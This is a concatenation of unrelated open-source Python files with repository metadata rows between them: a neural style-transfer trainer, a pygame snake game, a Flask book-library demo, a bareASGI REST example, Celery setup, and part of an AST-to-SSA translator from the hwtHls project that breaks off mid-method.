Author: Mohamed K. Eid (mohamedkeid@gmail.com)
Description: trains a generative model for stylizing an unseen image input with a particular style
Args:
train: path to image with style to learn
"""
import argparse
import os
import tensorflow as tf
import generator
import helpers
import trainer
# Model Hyper Params
CONTENT_LAYER = 'conv3_3'
STYLE_LAYERS = {'conv1_2': .25, 'conv2_2': .25, 'conv3_3': .25, 'conv4_3': .25}
assert sum(STYLE_LAYERS.values()) == 1, "Style layer weights must sum to 1"
EPOCHS = 30000
LEARNING_RATE = .001
TRAINING_DIMS = {'height': 256, 'width': 256}
RETRAIN = False
# Loss term weights
CONTENT_WEIGHT = 1.
STYLE_WEIGHT = .3
TV_WEIGHT = .1
# Default image paths
DIR_PATH = os.path.dirname(os.path.realpath(__file__))
DATA_DIR_PATH = DIR_PATH + '/../lib/images/train2014/'
TRAINED_MODELS_PATH = DIR_PATH + '/../lib/generators/'
TRAIN_PATH = None
# Logging params and config
PRINT_TRAINING_STATUS = True
PRINT_EVERY_N = 10
helpers.config_logging()
# Parse arguments and assign them to their respective global variables
def parse_args():
global TRAIN_PATH, RETRAIN
# Create flags and assign values to their respective variables
parser = argparse.ArgumentParser()
parser.add_argument('train', help="path to image with style to learn")
parser.add_argument('--retrain', action="store_true", help="whether or not to retrain a model")
args = parser.parse_args()
TRAIN_PATH = os.path.abspath(args.train)
RETRAIN = args.retrain
parse_args()
with tf.Session() as sess:
with tf.variable_scope('generator'):
gen = generator.Generator()
t = trainer.Trainer(sess, gen, TRAIN_PATH, TRAINING_DIMS, PRINT_TRAINING_STATUS, PRINT_EVERY_N)
t.train(EPOCHS, LEARNING_RATE, CONTENT_LAYER, CONTENT_WEIGHT, STYLE_LAYERS, STYLE_WEIGHT, TV_WEIGHT, RETRAIN)
sess.close()
| 28.621212
| 117
| 0.728428
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 710
| 0.37586
|
91ff58a8a89279f514514042538c466c72a92492
| 9,512
|
py
|
Python
|
xsnake/main.py
|
wcgbg/kids-keyboard
|
aaea8e7970407b02d46325654740859e1a7dbd83
|
[
"Apache-2.0"
] | null | null | null |
xsnake/main.py
|
wcgbg/kids-keyboard
|
aaea8e7970407b02d46325654740859e1a7dbd83
|
[
"Apache-2.0"
] | null | null | null |
xsnake/main.py
|
wcgbg/kids-keyboard
|
aaea8e7970407b02d46325654740859e1a7dbd83
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import glob
import os
import pygame
import random
import subprocess
import time
import maze_map
MIN_MARGIN = 32
PROGRESS_BAR_HEIGHT = 8
SELF_DIR = os.path.dirname(os.path.realpath(__file__))
class Game:
def __init__(self, map_size: int, maze: bool, video_ending: bool, surface):
self._map_size = map_size
self._surface = surface
self._video_ending = video_ending
self._maze_map = maze_map.MazeMap(map_size, map_size, maze)
surface_width, surface_height = surface.get_size()
assert surface_width >= surface_height
self._grid_size = (
surface_height - MIN_MARGIN * 2 - PROGRESS_BAR_HEIGHT) // map_size
if self._grid_size % 2 == 0:
self._grid_size -= 1 # make sure self._grid_size is odd
assert self._grid_size > 0
self._left = (surface_width - map_size * self._grid_size) // 2
self._top = (surface_height -
map_size * self._grid_size) // 2 + PROGRESS_BAR_HEIGHT
self._food_imgs = self._load_food_imgs()
self._ending_img = self._load_ending_img()
self._mplayer_proc = None
self._snake_pos = [(map_size // 2, map_size // 2)] * 2
self._food_pos = self._gen_food_pos()
self._food_img = random.choice(self._food_imgs)
self._is_ended = False
self._ending_length = min(
self._maze_map.x_size() * 2,
self._maze_map.x_size() * self._maze_map.y_size() // 2)
self._background_songs = glob.glob(SELF_DIR + '/bgmusic/*.mp3')
assert self._background_songs
random.shuffle(self._background_songs)
self._play_background_music()
def __del__(self):
if self._mplayer_proc:
self._mplayer_proc.kill()
def _gen_food_pos(self):
while True:
food_pos = (random.randint(0,
self._maze_map.x_size() - 1),
random.randint(0,
self._maze_map.y_size() - 1))
if food_pos not in self._snake_pos:
return food_pos
def _load_food_imgs(self):
img_files = glob.glob(SELF_DIR + '/food_img/*.png')
assert img_files
imgs = []
for img_file in img_files:
imgs.append(
pygame.transform.scale(
pygame.image.load(img_file),
(self._grid_size, self._grid_size)))
return imgs
def _load_ending_img(self):
img_size = min(self._surface.get_size())
return pygame.transform.scale(
pygame.image.load(SELF_DIR + '/ending.png'), (img_size, img_size))
def _play_background_music(self):
if self._is_ended:
pygame.mixer.music.load(SELF_DIR + '/ending.mp3')
pygame.mixer.music.set_volume(1.0)
pygame.mixer.music.play(-1)
else:
pygame.mixer.music.load(self._background_songs[0])
pygame.mixer.music.set_volume(0.4)
pygame.mixer.music.play(-1)
self._background_songs = self._background_songs[1:] + [
self._background_songs[0]
]
def update(self, direction):
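        # Overview: move the head one cell in `direction` when the maze allows it; grow by
        # one segment and respawn the food when the food cell is reached; switch to the
        # ending screen once the snake reaches self._ending_length; then redraw the board.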
if self._is_ended:
return
if direction:
assert direction in self._maze_map.directions()
if not self._maze_map.is_connected(self._snake_pos[0], direction):
return
new_head_pos = (self._snake_pos[0][0] + direction[0],
self._snake_pos[0][1] + direction[1])
if new_head_pos == self._food_pos:
self._snake_pos = [new_head_pos] + self._snake_pos
if len(self._snake_pos) >= self._ending_length:
self._is_ended = True
if self._video_ending:
pygame.mixer.music.stop()
self._mplayer_proc = subprocess.Popen(
['vlc', '-f', SELF_DIR + '/ending.mp4'])
else:
self._play_background_music()
else:
self._food_pos = self._gen_food_pos()
self._food_img = random.choice(self._food_imgs)
self._play_background_music()
else:
self._snake_pos = [new_head_pos] + self._snake_pos[:-1]
self._surface.fill(pygame.Color(0, 0, 0))
if self._is_ended:
surface_width, surface_height = self._surface.get_size()
assert surface_width >= surface_height
self._surface.blit(self._ending_img,
((surface_width - surface_height) // 2, 0))
else:
grid_color = pygame.Color(20, 20, 20)
wall_color = pygame.Color(255, 255, 255)
head_color = pygame.Color(100, 255, 100)
body_color = pygame.Color(80, 160, 80)
# progress bar
progress_bar_length = self._surface.get_width() * len(
self._snake_pos) // self._ending_length
self._surface.fill(
head_color,
pygame.Rect(0, 0, progress_bar_length, PROGRESS_BAR_HEIGHT))
for x in range(self._map_size + 1):
pygame.draw.line(self._surface, grid_color,
(self._left + x * self._grid_size, self._top),
(self._left + x * self._grid_size,
self._top + self._map_size * self._grid_size))
for y in range(self._map_size + 1):
pygame.draw.line(self._surface, grid_color,
(self._left, self._top + y * self._grid_size),
(self._left + self._map_size * self._grid_size,
self._top + y * self._grid_size))
for x in range(self._map_size + 1):
for y in range(self._map_size):
if x == self._map_size or not self._maze_map.is_connected(
(x, y), (-1, 0)):
pygame.draw.line(
self._surface, wall_color,
(self._left + x * self._grid_size,
self._top + y * self._grid_size),
(self._left + x * self._grid_size,
self._top + (y + 1) * self._grid_size), 3)
for y in range(self._map_size + 1):
for x in range(self._map_size):
if y == self._map_size or not self._maze_map.is_connected(
(x, y), (0, -1)):
pygame.draw.line(
self._surface, wall_color,
(self._left + x * self._grid_size,
self._top + y * self._grid_size),
(self._left + (x + 1) * self._grid_size,
self._top + y * self._grid_size), 3)
for i, pos in reversed(list(enumerate(self._snake_pos))):
if i == 0: # head
radius = int(self._grid_size * 0.45)
color = head_color
else:
radius = int(self._grid_size * 0.3)
color = body_color
pygame.draw.circle(
self._surface, color,
(self._left + pos[0] * self._grid_size +
self._grid_size // 2 + 1, self._top +
pos[1] * self._grid_size + self._grid_size // 2 + 1),
radius)
self._surface.blit(
self._food_img,
(self._left + self._food_pos[0] * self._grid_size,
self._top + self._food_pos[1] * self._grid_size))
pygame.display.flip()
def is_ended(self) -> bool:
return self._is_ended
def main():
parser = argparse.ArgumentParser(description='Snake')
parser.add_argument('--map_size', type=int, default=6)
parser.add_argument('--maze', action='store_true')
parser.add_argument('--video_ending', action='store_true')
args = parser.parse_args()
pygame.init()
pygame.display.set_caption("Snake")
pygame.mouse.set_visible(False)
surface = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)
game = Game(args.map_size, args.maze, args.video_ending, surface)
while True:
event = pygame.event.wait()
if event.type == pygame.QUIT:
break
direction = None
if event.type == pygame.KEYDOWN:
mods = pygame.key.get_mods()
if mods & pygame.KMOD_CTRL and event.key == pygame.K_q:
break
if event.key == pygame.K_SPACE and game.is_ended():
del game
args.map_size += 1
game = Game(args.map_size, args.maze, args.video_ending,
surface)
continue
if event.key == pygame.K_LEFT:
direction = (-1, 0)
elif event.key == pygame.K_RIGHT:
direction = (1, 0)
elif event.key == pygame.K_UP:
direction = (0, -1)
elif event.key == pygame.K_DOWN:
direction = (0, 1)
game.update(direction)
pygame.quit()
if __name__ == '__main__':
main()
| 39.305785
| 80
| 0.527965
| 7,768
| 0.816653
| 0
| 0
| 0
| 0
| 0
| 0
| 264
| 0.027754
|
91ff5f7c6e601aeebe16cd2ed27293363ad42fda
| 5,342
|
py
|
Python
|
flaskmodel/flask_book_project.py
|
JennyHan2016/ProxyPool
|
2e65547e5d3811db32c5e79c4d70e108e0b1e934
|
[
"Apache-2.0"
] | null | null | null |
flaskmodel/flask_book_project.py
|
JennyHan2016/ProxyPool
|
2e65547e5d3811db32c5e79c4d70e108e0b1e934
|
[
"Apache-2.0"
] | null | null | null |
flaskmodel/flask_book_project.py
|
JennyHan2016/ProxyPool
|
2e65547e5d3811db32c5e79c4d70e108e0b1e934
|
[
"Apache-2.0"
] | null | null | null |
from flask import Flask, render_template, flash,request,redirect,url_for
from flask_sqlalchemy import SQLAlchemy
from flaskmodel.config import *
from flask_wtf import FlaskForm
from wtforms import StringField,SubmitField
from wtforms.validators import DataRequired
app = Flask(__name__)
# Create the database connection
db = SQLAlchemy(app)
'''
1. Configure the database
    a. Import the SQLAlchemy extension
    b. Create the db object and configure its parameters
    c. Create the database from the terminal
2. Add the Book and Author models
    a. Inherit from db.Model
    b. __tablename__: the table name
    c. Define the column names
    d. Define the relationship
3. Add data
4. Use a template to display the data queried from the database
    a. A for loop in the template is enough (I tried doing it in the .py file first, but that did not work)
5. Use Flask-WTF to display the form
    a. Define a custom form class
    b. Render it in the template
    c. Watch out for secret_key / encoding / csrf_token issues
6. Implement the add/delete logic
    a. Add records
    b. Delete a book: done from the page; the click has to send the record's ID to the delete-book route,
       and the route must accept that parameter (uses for/else, redirect and url_for)
    c. Delete an author
'''
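# The DIALECT/DRIVER/USERNAME/PASSWORD/HOST/PORT/DATABASE names imported from
# flaskmodel.config above are not shown in this file; a typical definition
# (an assumption, not the project's actual config) would be:
#   DIALECT = 'mysql'
#   DRIVER = 'pymysql'
#   USERNAME = 'root'
#   PASSWORD = '...'
#   HOST = '127.0.0.1'
#   PORT = '3306'
#   DATABASE = 'library'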
# Configure the database address (connection URI)
app.config['SQLALCHEMY_DATABASE_URI'] = '{}+{}://{}:{}@{}:{}/{}?charset=utf8'.format(DIALECT,DRIVER,USERNAME,PASSWORD,HOST,PORT,DATABASE)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.secret_key = 'hbb'
# Custom form class
class AuthorForm(FlaskForm):
author = StringField('作者',validators=[DataRequired()])
book = StringField('书籍',validators=[DataRequired()])
submit = SubmitField('提交')
# Add the Book and Author models
class Author(db.Model):
    # table name
    __tablename__ = 'authors'
    # columns
id = db.Column(db.Integer,primary_key = True)
author_name = db.Column(db.String(16),unique = True)
books = db.relationship('Book',backref='author')
    # relationship reference
# books = db.relationship()
def __repr__ (self):
return '<Author: %r>' % self.author_name
class Book(db.Model):
__tablename__ = 'books'
id = db.Column(db.Integer,primary_key=True)
book_name = db.Column(db.String(255),unique=True)
author_id = db.Column(db.Integer, db.ForeignKey('authors.id'))
def __repr__ (self):
return '<Book: %r %r>' % (self.book_name,self.author_id)
# Delete an author (remember to also delete their books)
@app.route('/delete_author/<author_id>')
def delete_author(author_id):
author = Author.query.get(author_id)
if author:
try:
Book.query.filter_by(author_id = author_id).delete()
db.session.delete(author)
db.session.commit()
except Exception as e:
flash('删除作者出错')
db.session.rollback()
else:
flash('作者找不到')
return redirect(url_for('index'))
@app.route('/delete_book/<book_id>')
def delete_book(book_id):
book = Book.query.get(book_id)
if book:
try:
db.session.delete(book)
db.session.commit()
except Exception as e:
flash('删除书籍出错')
db.session.rollback()
else:
flash('书籍找不到')
return redirect(url_for('index'))
@app.route('/',methods = ['GET','POST'])
def index():
    # Create the custom form
author_form = AuthorForm()
    # Query all authors and pass them to the template
    '''
    Validation logic:
    1. Use Flask-WTF's validation
    2. If validation passes, read the submitted data
    3. Check whether the author already exists
    4. If the author exists: add the book only when it is not a duplicate, otherwise show an error
    5. If the author does not exist, add both the author and the book
    6. If validation fails, show an error
    '''
    # 1. Use Flask-WTF's validation
    if author_form.validate_on_submit():
        # 2. Validation passed: read the submitted data
        author_name = author_form.author.data
        book_name = author_form.book.data
        # 3. Check whether the author already exists
author = Author.query.filter_by(author_name=author_name).first()
book = Book.query.filter_by(book_name=book_name).first()
        # 4. The author exists
        if author:
            # check whether this book already exists; add it if not, otherwise report an error
            if book:
                # a book with the same title already exists: notify the user
                flash('已存在同名同作者书籍')
            else:
                # no duplicate title: add the record
try:
new_book = Book(book_name = book_name,author_id = author.id)
db.session.add(new_book)
db.session.commit()
except Exception as e:
print(e)
flash('有作者时添加书籍失败')
                    db.session.rollback()  # roll back if the insert fails
else:
            # the author does not exist: check whether the book already exists
            if book:
                # a book with the same title already exists: notify the user
                flash('已存在相同的书籍')
            else:
                # no duplicate title: add both the author and the book
try:
new_author = Author(author_name=author_name)
db.session.add(new_author)
db.session.commit()
new_book = Book(book_name=book_name, author_id=new_author.id)
db.session.add(new_book)
db.session.commit()
except Exception as e:
print(e)
flash('无作者时添加书籍失败')
                    db.session.rollback()  # roll back if the insert fails
else:
if request.method == 'POST':
flash('参数不全!')
authors = Author.query.all()
return render_template('books.html',authors = authors,form = author_form)
if __name__ == '__main__':
# db.create_all()
# db.drop_all()
    # Seed data
# au1 = Author(author_name = 'hbb')
# au2 = Author(author_name = 'ry')
# au3 = Author(author_name = 'rmf')
# db.session.add_all([au1,au2,au3])
# db.session.commit()
#
# bk1 = Book(book_name = '量子史话',author_id = au1.id)
# bk2 = Book(book_name = '我们仨',author_id = au1.id)
# bk3 = Book(book_name = '管理学',author_id = au2.id)
# bk4 = Book(book_name = '玩具的学与玩',author_id = au3.id)
# bk5 = Book(book_name = '教养的迷思',author_id = au3.id)
# db.session.add_all([bk1,bk2,bk3,bk4,bk5])
# db.session.commit()
app.run(debug=True)
| 29.513812
| 137
| 0.588731
| 859
| 0.132398
| 0
| 0
| 3,480
| 0.536375
| 0
| 0
| 2,911
| 0.448674
|
91ffc327acbe66a0dfdec62b3fb9d0478e21a89a
| 1,012
|
py
|
Python
|
examples/simple_rest_nt.py
|
rob-blackbourn/bareASGI-tutorial
|
736a0e5f6e73c158101be95d0b0f456065549725
|
[
"Apache-2.0"
] | 1
|
2022-02-14T09:08:16.000Z
|
2022-02-14T09:08:16.000Z
|
examples/simple_rest_nt.py
|
rob-blackbourn/bareASGI-tutorial
|
736a0e5f6e73c158101be95d0b0f456065549725
|
[
"Apache-2.0"
] | 5
|
2021-03-09T22:39:17.000Z
|
2022-02-26T19:52:36.000Z
|
examples/simple_rest_nt.py
|
rob-blackbourn/bareASGI-tutorial
|
736a0e5f6e73c158101be95d0b0f456065549725
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import json
from hypercorn.asyncio import serve
from hypercorn.config import Config
from bareasgi import Application, text_reader, text_writer
import bareutils.header as header
async def get_info(scope, info, matches, content):
accept = header.find(b'accept', scope['headers'])
if accept != b'application/json':
return 500
text = json.dumps(info)
headers = [
(b'content-type', b'application/json')
]
return 200, headers, text_writer(text)
async def set_info(scope, info, matches, content):
content_type = header.find(b'content-type', scope['headers'])
if content_type != b'application/json':
return 500
text = await text_reader(content)
data = json.loads(text)
info.update(data)
return 204
app = Application(info={'name': 'Michael Caine'})
app.http_router.add({'GET'}, '/info', get_info)
app.http_router.add({'POST'}, '/info', set_info)
config = Config()
config.bind = ["0.0.0.0:9009"]
asyncio.run(serve(app, config))
| 27.351351
| 65
| 0.690711
| 0
| 0
| 0
| 0
| 0
| 0
| 583
| 0.576087
| 174
| 0.171937
|
620015da2fb2461bd1becafb3bfad88fa6ea66e6
| 567
|
py
|
Python
|
memory/build_memory.py
|
ngowilliam1/more-contrastive
|
50884c369145d19a39edabf56ecfdc02af1b42c4
|
[
"Apache-2.0"
] | 70
|
2020-12-04T06:44:57.000Z
|
2022-03-30T03:38:55.000Z
|
memory/build_memory.py
|
ngowilliam1/more-contrastive
|
50884c369145d19a39edabf56ecfdc02af1b42c4
|
[
"Apache-2.0"
] | 18
|
2020-12-31T03:57:35.000Z
|
2021-10-21T06:41:41.000Z
|
infomin/build_memory.py
|
frank-xwang/CLD
|
0852e5c3d0f0c28e85668b87b4fff20bd67e3efd
|
[
"MIT"
] | 6
|
2021-04-13T18:09:14.000Z
|
2021-12-14T11:18:23.000Z
|
from .mem_bank import RGBMem, CMCMem
from .mem_moco import RGBMoCo, CMCMoCo
def build_mem(opt, n_data):
if opt.mem == 'bank':
mem_func = RGBMem if opt.modal == 'RGB' else CMCMem
memory = mem_func(opt.feat_dim, n_data,
opt.nce_k, opt.nce_t, opt.nce_m)
elif opt.mem == 'moco':
mem_func = RGBMoCo if opt.modal == 'RGB' else CMCMoCo
memory = mem_func(opt.feat_dim, opt.nce_k, opt.nce_t)
else:
raise NotImplementedError(
            'mem not supported: {}'.format(opt.mem))
return memory
| 31.5
| 61
| 0.611993
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 44
| 0.077601
|
6200daab351d8a43f810d28196ac2f8c75e8b726
| 803
|
py
|
Python
|
Aves2/Aves2/celery.py
|
jd-aig/aves2
|
10aeb832feb94adf563f9795013c77bfd115b44e
|
[
"Apache-2.0"
] | 3
|
2020-09-24T01:36:02.000Z
|
2022-03-28T11:53:54.000Z
|
Aves2/Aves2/celery.py
|
jd-aig/aves2
|
10aeb832feb94adf563f9795013c77bfd115b44e
|
[
"Apache-2.0"
] | null | null | null |
Aves2/Aves2/celery.py
|
jd-aig/aves2
|
10aeb832feb94adf563f9795013c77bfd115b44e
|
[
"Apache-2.0"
] | 1
|
2020-12-08T05:14:23.000Z
|
2020-12-08T05:14:23.000Z
|
# -*- coding:utf-8 -*-
from __future__ import absolute_import, unicode_literals
import os
from celery import Celery
from celery.schedules import crontab
# from celery_once import QueueOnce
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Aves2.settings')
app = Celery('Aves2')
# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
# should have a `CELERY_` prefix.
app.config_from_object('django.conf:settings', namespace='CELERY')
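# For example, a CELERY_BROKER_URL entry in Django settings is picked up here as the
# Celery `broker_url` option (the actual settings used by this project are not shown).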
# Load task modules from all registered Django app configs.
app.autodiscover_tasks()
app.conf.timezone = 'Asia/Shanghai'
# Add periodic-tasks
app.conf.beat_schedule = {
}
| 27.689655
| 66
| 0.775841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 503
| 0.626401
|
62011193ee986970753cb1015967250f10e93794
| 14,374
|
py
|
Python
|
hwtHls/ssa/translation/fromAst/astToSsa.py
|
Nic30/hwtHls
|
1fac6ed128318e698d51e15e9871249ddf243e1c
|
[
"MIT"
] | 8
|
2018-09-25T03:28:11.000Z
|
2021-12-15T07:44:38.000Z
|
hwtHls/ssa/translation/fromAst/astToSsa.py
|
Nic30/hwtHls
|
1fac6ed128318e698d51e15e9871249ddf243e1c
|
[
"MIT"
] | 1
|
2020-12-21T10:56:44.000Z
|
2020-12-21T10:56:44.000Z
|
hwtHls/ssa/translation/fromAst/astToSsa.py
|
Nic30/hwtHls
|
1fac6ed128318e698d51e15e9871249ddf243e1c
|
[
"MIT"
] | 2
|
2018-09-25T03:28:18.000Z
|
2021-12-15T10:28:35.000Z
|
from typing import Union, List, Optional, Tuple, Set
from hwt.hdl.operator import Operator
from hwt.hdl.operatorDefs import AllOps
from hwt.hdl.portItem import HdlPortItem
from hwt.hdl.statements.assignmentContainer import HdlAssignmentContainer
from hwt.hdl.statements.codeBlockContainer import HdlStmCodeBlockContainer
from hwt.hdl.statements.ifContainter import IfContainer
from hwt.hdl.value import HValue
from hwt.synthesizer.rtlLevel.rtlSignal import RtlSignal
from hwt.synthesizer.rtlLevel.signalUtils.exceptions import SignalDriverErr
from hwtHls.hlsStreamProc.statements import HlsStreamProcStm, HlsStreamProcWhile, \
HlsStreamProcWrite, HlsStreamProcRead, HlsStreamProcCodeBlock, \
HlsStreamProcIf, HlsStreamProcFor, HlsStreamProcContinue, HlsStreamProcBreak
from hwtHls.ssa.basicBlock import SsaBasicBlock
from hwtHls.ssa.context import SsaContext
from hwtHls.ssa.instr import SsaInstr, SsaInstrBranch
from hwtHls.ssa.translation.fromAst.memorySSAUpdater import MemorySSAUpdater
from hwtHls.ssa.value import SsaValue
AnyStm = Union[HdlAssignmentContainer, HlsStreamProcStm]
class SsaInstrBranchUnreachable(SsaInstrBranch):
def addTarget(self, cond:Optional[SsaValue], target:"SsaBasicBlock"):
pass
class SsaBasicBlockUnreachable(SsaBasicBlock):
def __init__(self, ctx: SsaContext, label:str):
SsaBasicBlock.__init__(self, ctx, label)
self.successors = SsaInstrBranchUnreachable(self)
class AstToSsa():
"""
* Matthias Braun, Sebastian Buchwald, Sebastian Hack, Roland Leißa, Christoph Mallon, and Andreas Zwinkau. 2013.
Simple and efficient construction of static single assignment form.
In Proceedings of the 22nd international conference on Compiler Construction (CC'13).
Springer-Verlag, Berlin, Heidelberg, 102–122. DOI:https://doi.org/10.1007/978-3-642-37051-9_6
* avoids computation of dominance or iterated DF
* works directly on AST (avoids CFG)
:see: https://github.com/lohner/FormalSSA
    :note: New statements generate a new block; if the statement is not a loop, the block is sealed.
        If the statement is a loop, the first block is sealed once all jumps from the loop end are resolved.
        Once a block is sealed, the arguments of all its phi functions are resolved recursively
        and redundant phis are reduced.
:see: http://dev.stephendiehl.com/numpile/
:ivar start: basic block where the program begins
    :ivar m_ssa_u: object which is used to track variable usage and to construct SsaPhi for SSA normal form
    :ivar _continue_target: list of basic blocks where code should jump on continue statement
    :ivar _break_target: list of basic blocks where code should jump on break statement
    :ivar _loop_stack: list of the loops the AST visitor is currently inside, used to resolve
        the continue/break to loop association. The record is a tuple (loop statement, entry block, list of blocks ending with break).
        The blocks ending with break have their branch destination assigned after the loop is processed (in the loop parsing fn.).
"""
def __init__(self, ssaCtx: SsaContext, startBlockName:str, original_code_for_debug: Optional[HlsStreamProcCodeBlock]):
self.ssaCtx = ssaCtx
self.start = SsaBasicBlock(ssaCtx, startBlockName)
self.m_ssa_u = MemorySSAUpdater(self._onBlockReduce, self.visit_expr)
        # all predecessors known (because this is an entry point)
self._onAllPredecsKnown(self.start)
self._continue_target: List[SsaBasicBlock] = []
self._break_target: List[SsaBasicBlock] = []
self.original_code_for_debug = original_code_for_debug
self._loop_stack: List[Tuple[HlsStreamProcWhile, SsaBasicBlock, List[SsaBasicBlock]]] = []
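    # Rough illustration of the construction described in the class docstring (not code
    # from this library): for an if/else such as
    #     if c: x = a
    #     else: x = b
    #     use(x)
    # visit_If creates a condition block, one block per branch and an end block; once the
    # end block is sealed, readVariable(x) in it materializes a phi
    # x2 = phi(x0 from the true branch, x1 from the false branch), and phis whose
    # operands all turn out identical are reduced away.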
def _onBlockReduce(self, block: SsaBasicBlock, replacement: SsaBasicBlock):
if block is self.start:
self.start = replacement
@staticmethod
def _addNewTargetBb(predecessor: SsaBasicBlock, cond: Optional[RtlSignal], label: str, origin) -> SsaBasicBlock:
new_block = SsaBasicBlock(predecessor.ctx, label)
if origin is not None:
new_block.origins.append(origin)
predecessor.successors.addTarget(cond, new_block)
return new_block
def _onAllPredecsKnown(self, block: SsaBasicBlock):
self.m_ssa_u.sealBlock(block)
def visit_top_CodeBlock(self, obj: HdlStmCodeBlockContainer) -> SsaBasicBlock:
block = self.visit_CodeBlock(self.start, obj)
self._onAllPredecsKnown(block)
return block
def visit_CodeBlock(self, block: SsaBasicBlock, obj: HdlStmCodeBlockContainer) -> SsaBasicBlock:
return self.visit_CodeBlock_list(block, obj.statements)
def visit_CodeBlock_list(self, block: SsaBasicBlock, obj: List[AnyStm]) -> SsaBasicBlock:
for o in obj:
if isinstance(o, HdlAssignmentContainer):
block = self.visit_Assignment(block, o)
elif isinstance(o, HlsStreamProcWrite):
block = self.visit_Write(block, o)
elif isinstance(o, HlsStreamProcWhile):
block = self.visit_While(block, o)
elif isinstance(o, HlsStreamProcFor):
block = self.visit_For(block, o)
elif isinstance(o, (HlsStreamProcIf, IfContainer)):
block = self.visit_If(block, o)
elif isinstance(o, HlsStreamProcRead):
block, _ = self.visit_expr(block, o)
elif isinstance(o, HlsStreamProcBreak):
block = self.visit_Break(block, o)
elif isinstance(o, HlsStreamProcContinue):
                block = self.visit_Continue(block, o)
else:
raise NotImplementedError(o)
return block
def visit_expr(self, block: SsaBasicBlock, var: Union[RtlSignal, HValue]) -> Tuple[SsaBasicBlock, Union[SsaValue, HValue]]:
if isinstance(var, RtlSignal):
try:
op = var.singleDriver()
except SignalDriverErr:
op = None
if op is None or not isinstance(op, Operator):
if isinstance(op, HdlPortItem):
raise NotImplementedError(op)
elif isinstance(op, HlsStreamProcRead):
if op.block is None:
block.appendInstruction(op)
# HlsStreamProcRead is a SsaValue and thus represents "variable"
self.m_ssa_u.writeVariable(var, (), block, op)
return block, op
elif isinstance(op, (HlsStreamProcBreak, HlsStreamProcContinue)):
raise NotImplementedError()
else:
return block, self.m_ssa_u.readVariable(var, block)
if op.operator in (AllOps.BitsAsVec, AllOps.BitsAsUnsigned) and not var._dtype.signed:
# skip implicit conversions
assert len(op.operands) == 1
return self.visit_expr(block, op.operands[0])
ops = []
for o in op.operands:
block, _o = self.visit_expr(block, o)
ops.append(_o)
self.m_ssa_u.writeVariable(var, (), block, tuple(ops))
var = SsaInstr(block.ctx, var._dtype, op.operator, ops, origin=var)
block.appendInstruction(var)
            # we know for sure that this is in this block, which is why we do not need to use readVariable
return block, var
elif isinstance(var, HValue):
return block, var
else:
if isinstance(var, HlsStreamProcRead):
if var.block is None:
block.appendInstruction(var)
# HlsStreamProcRead is a SsaValue and thus represents "variable"
self.m_ssa_u.writeVariable(var._sig, (), block, var)
var = var._sig
return block, self.m_ssa_u.readVariable(var, block)
def visit_For(self, block: SsaBasicBlock, o: HlsStreamProcFor) -> SsaBasicBlock:
block = self.visit_CodeBlock_list(block, o.init)
return self.visit_While(block, HlsStreamProcWhile(o.parent, o.cond, o.body + o.step))
def visit_While(self, block: SsaBasicBlock, o: HlsStreamProcWhile) -> SsaBasicBlock:
if isinstance(o.cond, HValue):
if o.cond:
# while True
cond_block = self._addNewTargetBb(block, None, f"{block.label:s}_whC", o)
self._loop_stack.append((o, cond_block, []))
body_block = self._addNewTargetBb(cond_block, None, f"{block.label:s}_wh", o)
self._onAllPredecsKnown(body_block)
body_block = self.visit_CodeBlock_list(body_block, o.body)
body_block.successors.addTarget(None, cond_block)
self._onAllPredecsKnown(cond_block)
_o, _, breaks = self._loop_stack.pop()
assert _o is o, (_o, o, "Must be record of this loop")
if breaks:
end_block = SsaBasicBlock(block.ctx, f"{block.label:s}_whEnd")
for b in breaks:
b: SsaBasicBlock
b.successors.addTarget(None, end_block)
else:
end_block = SsaBasicBlockUnreachable(block.ctx, f"{block.label:s}_whUnreachable")
self._onAllPredecsKnown(end_block)
else:
# while False
end_block = block
else:
#
cond_block_orig = self._addNewTargetBb(block, None, f"{block.label:s}_whC", o)
c = o.cond
if c._dtype.bit_length() > 1:
c = c != 0
else:
c = c._isOn()
cond_block, c = self.visit_expr(cond_block_orig, c)
cond_block.origins.append(o)
self._loop_stack.append((o, cond_block, []))
body_block = self._addNewTargetBb(cond_block, c, f"{block.label:s}_wh", o)
self._onAllPredecsKnown(body_block)
end_block = self._addNewTargetBb(cond_block, None, f"{block.label:s}_whE", o)
body_block = self.visit_CodeBlock_list(body_block, o.body)
body_block.successors.addTarget(None, cond_block)
self._onAllPredecsKnown(cond_block_orig)
_o, _, breaks = self._loop_stack.pop()
assert _o is o, (_o, o, "Must be record of this loop")
if breaks:
for b in breaks:
b: SsaBasicBlock
b.successors.addTarget(None, end_block)
self._onAllPredecsKnown(end_block)
return end_block
def visit_Continue(self, block: SsaBasicBlock, o: HlsStreamProcContinue) -> SsaBasicBlock:
assert self._loop_stack, (o, "Must be in loop")
_, loop_entry, _ = self._loop_stack[-1]
block.successors.addTarget(None, loop_entry)
return self._make_Unreachable(block.ctx, f"{block.label:s}_conUnreachable")
def _make_Unreachable(self, ctx:SsaContext, label:str):
end_block = SsaBasicBlockUnreachable(ctx, label)
self._onAllPredecsKnown(end_block)
return end_block
    def visit_Break(self, block: SsaBasicBlock, o: HlsStreamProcBreak) -> SsaBasicBlock:
assert self._loop_stack, (o, "Must be in loop")
_, _, break_blocks = self._loop_stack[-1]
break_blocks.append(block)
return self._make_Unreachable(block.ctx, f"{block.label:s}_breUnreachable")
def visit_If_branch(self, origin: IfContainer, label: str, cond_block: SsaBasicBlock,
end_if_block: SsaBasicBlock, cond: Optional[SsaValue], caseStatements: list):
if caseStatements:
# new top block for the branch
block = self._addNewTargetBb(cond_block, cond, label, origin)
self._onAllPredecsKnown(block)
# load body of the branch
block = self.visit_CodeBlock_list(block, caseStatements)
# add jump from the end of the branch to end of if-then-else
block.successors.addTarget(None, end_if_block)
# now nothing can jump on start or end of the branch, end_if_block will be only successor
else:
cond_block.successors.addTarget(cond, end_if_block)
def visit_If(self, block: SsaBasicBlock, o: HlsStreamProcIf) -> SsaBasicBlock:
